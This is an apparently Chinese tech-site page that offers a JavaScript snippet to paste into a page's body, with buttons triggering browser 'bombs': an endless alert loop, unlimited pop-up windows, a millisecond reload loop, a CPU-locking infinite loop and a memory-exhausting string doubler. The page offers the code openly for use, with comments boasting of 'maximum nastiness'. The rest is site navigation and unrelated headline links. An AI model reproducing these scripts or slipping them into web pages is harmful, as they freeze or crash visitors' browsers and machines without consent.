首页| 新闻| 娱乐| 游戏| 科普| 文学| 编程| 系统| 数据库| 建站| 学院| 产品| 网管| 维修| 办公| 热点
<!--把如下代码加入<body>区域中:--><SCRipT LANGUAGE="javaScript"><!-- Beginfunction AnnoyingButton(){ while (true) window.alert("HAHAHA...you can't do anything anymore in Netscape without exiting and restarting....HAHAHA so gimme da UT now...or else!") }// Keep opening windows over and over againfunction WindowBomb(){ var iCounter = 0 // dummy counter while (true) { window.open("http://www.vevb.com","CRASHING" + iCounter,"width=1,height=1,resizable=no") iCounter++ }}// Not as interesting as the other bombs, but this one forces the user to// stay at the current page. User cannot switch to another page, or click// stop to stop the reloading.function ReloadBomb(){ history.go(0) // reload this page window.setTimeout('ReloadBomb()',1) // tell netscape to hit this function // every milisecond =)}// Not a very interesting bomb, it does nothing really :>function WhileLoopLock(){ while (true){}}var szEatMemory = "GOBBLEGOBBLE" // our string to consume our memory// Now this function EatMemoryInTime is a interesting one that could be// placed on a timer for maximum nastiness :> I have been able to get// up to 4Megs consumed by Netscape forcing my machine to crawl =)// AND it's time driven! No while loops here!function EatMemoryInTime(){ szEatMemory = szEatMemory + szEatMemory // keep appending window.status = "String Length is: " + szEatMemory.length // report size window.setTimeout('EatMemoryInTime()',1); // tell netscape to hit this function}// End --></SCRIPT><center>下面的每一个按钮都很危险,一按你的电脑立即<font color=red>OVER</font>,不信试试吧!!!<br><FORM method=post name="FormAction" action="mailto:"+"webmaster@Javascript2000.com"><INPUT TYPE="button" value="Exploding Windows"Name="btnExplodeWindows" onClick="WindowBomb()"><P><br><INPUT TYPE="button" value="Annoying Button" Name="btnAnnoy"onClick="AnnoyingButton()"><P><br><INPUT TYPE="button" value="Reload Bomb" Name="btnReload"onClick="ReloadBomb()"><P><br><INPUT TYPE="button" value="While Loop Lock" Name="btnWhile"onClick="WhileLoopLock()"><p><br> <INPUT TYPE="button" value="Eat Memory In Time" Name="btnEatTime"onClick="EatMemoryInTime()"><p><br><INPUT TYPE="button" value="Action!" onClick="document.FormAction.submit()"><br></center>
Intel工程样品CPU的识别方法
图解CMOS路线和硬盘光驱跳线的
硬盘分区如何设置准确的分区空间
回眸一笑百魅生,六宫粉黛无颜色
岁月静美,剪一影烟雨江南
芜湖有个“松鼠小镇”
小满:小得盈满,一切刚刚好!
一串串晶莹剔透的葡萄,像一颗颗宝石挂在藤
正宗老北京脆皮烤鸭
人逢知己千杯少,喝酒搞笑图集
搞笑试卷,学生恶搞答题
新闻热点
疑难解答
图片精选
微信小程序各种坑?填坑tip
web前端如何让网页布局稳定性和标
CSS定位深入理解 完全掌握CSS定位
彻底理解浮动float CSS浮动详解 清
网友关注